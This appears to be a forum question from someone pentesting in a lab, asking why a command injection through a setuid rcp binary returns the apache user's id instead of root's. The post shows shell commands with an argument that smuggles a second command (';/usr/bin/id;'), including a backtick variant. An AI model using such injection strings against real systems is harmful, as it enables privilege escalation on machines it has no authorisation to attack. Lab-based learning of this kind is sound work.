While pentesting in a lab, came across an rcp binary with setuid bit which looked like a potential privilege escalation vector.
bash-3.1$ ls -l /usr/bin/rcp -rwsr-xr-x 1 root root 18544 May 18 2007 /usr/bin/rcp
Following the explanation at https://securiteam.com/exploits/6b00l1p0bc/ , I tried the following:
bash-3.1$ /usr/bin/rcp 'bob bobalina;/usr/bin/id;' 127.0.0.1 uid=48(apache) gid=48(apache) groups=48(apache) bash: 127.0.0.1: command not found
My understanding is that since rcp is setuid as root, any command executed by it must be run as root. Why am I then seeing the output of /usr/bin/id as apache, which is the user I am running as?
I’m not a great Linux guy so if I’m missing something obvious, please let me know.
I’ve also tried the command injection with backticks, got the same result:
bash-3.1$ /usr/bin/rcp ``bob bobalina;/usr/bin/id;`` 127.0.0.1 uid=48(apache) gid=48(apache) groups=48(apache) bash: 127.0.0.1: command not found